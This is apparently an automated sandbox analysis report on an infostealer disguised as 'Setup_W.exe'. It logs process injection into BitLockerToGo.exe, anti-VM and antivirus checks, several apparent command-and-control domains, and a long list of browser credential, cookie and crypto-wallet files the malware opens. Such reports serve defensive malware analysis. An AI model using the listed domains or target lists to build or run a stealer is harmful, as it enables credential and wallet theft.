              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\Setup_W.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\glfw.4281411633.dllJump to dropped file
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 7728Thread sleep time: -150000s >= -30000sJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 7752Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: BitLockerToGo.exe, BitLockerToGo.exe, 00000004.00000003.2145451743.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063212917.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2169738032.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2293630756.000000000324C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292404891.000000000324C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2293687502.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292724484.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292404891.0000000003286000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Setup_W.exe, 00000000.00000002.2013046042.000000000115E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\Setup_W.exeCode function: 0_2_64608848 SystemParametersInfoW,KiUserCallbackDispatcher,SystemParametersInfoW,LoadLibraryA,SystemParametersInfoW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetProcessDpiAwarenessContext,SetProcessDPIAware,GetModuleHandleW,CreateWindowExW,ShowWindow,RegisterDeviceNotificationW,PeekMessageW,TranslateMessage,DispatchMessageW,0_2_64608848
              Source: C:\Users\user\Desktop\Setup_W.exeCode function: 0_2_646105EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,0_2_646105EC
              Source: C:\Users\user\Desktop\Setup_W.exeCode function: 0_2_646105F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,0_2_646105F0

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\Setup_W.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\Setup_W.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: Setup_W.exe, 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: rapeflowwj.lat
              Source: Setup_W.exe, 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: crosshuaht.lat
              Source: Setup_W.exe, 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: sustainskelet.lat
              Source: Setup_W.exe, 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: aspecteirs.lat
              Source: Setup_W.exe, 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: energyaffai.lat
              Source: Setup_W.exe, 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: necklacebudi.lat
              Source: Setup_W.exe, 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: discokeyus.lat
              Source: Setup_W.exe, 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: grannyejh.lat
              Source: Setup_W.exe, 00000000.00000002.2014473748.0000000009E84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: mooncobudy.click
              Source: C:\Users\user\Desktop\Setup_W.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2F62008Jump to behavior
              Source: C:\Users\user\Desktop\Setup_W.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000Jump to behavior
              Source: C:\Users\user\Desktop\Setup_W.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000Jump to behavior
              Source: C:\Users\user\Desktop\Setup_W.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 440000Jump to behavior
              Source: C:\Users\user\Desktop\Setup_W.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 443000Jump to behavior
              Source: C:\Users\user\Desktop\Setup_W.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 452000Jump to behavior
              Source: C:\Users\user\Desktop\Setup_W.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Setup_W.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Setup_W.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Setup_W.exeCode function: 0_2_64610530 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_64610530
              Source: C:\Users\user\Desktop\Setup_W.exeCode function: 0_2_646031E0 glfwGetVersion,0_2_646031E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: BitLockerToGo.exe, 00000004.00000003.2169738032.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2293855753.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292404891.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2169550431.0000000005551000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2169597412.00000000032E1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2182980470.00000000032E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7680, type: MEMORYSTR
              Source: BitLockerToGo.exeString found in binary or memory: s/Electrum-LTC
              Source: BitLockerToGo.exeString found in binary or memory: /Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Walletsf`Cc!
              Source: BitLockerToGo.exeString found in binary or memory: window-state.json
              Source: BitLockerToGo.exeString found in binary or memory: Wallets/JAXX New Version
              Source: BitLockerToGo.exeString found in binary or memory: Wallets/Exodus
              Source: BitLockerToGo.exeString found in binary or memory: %appdata%\Ethereum
              Source: BitLockerToGo.exe, 00000004.00000003.2145537455.0000000003258000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: BitLockerToGo.exeString found in binary or memory: keystore
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
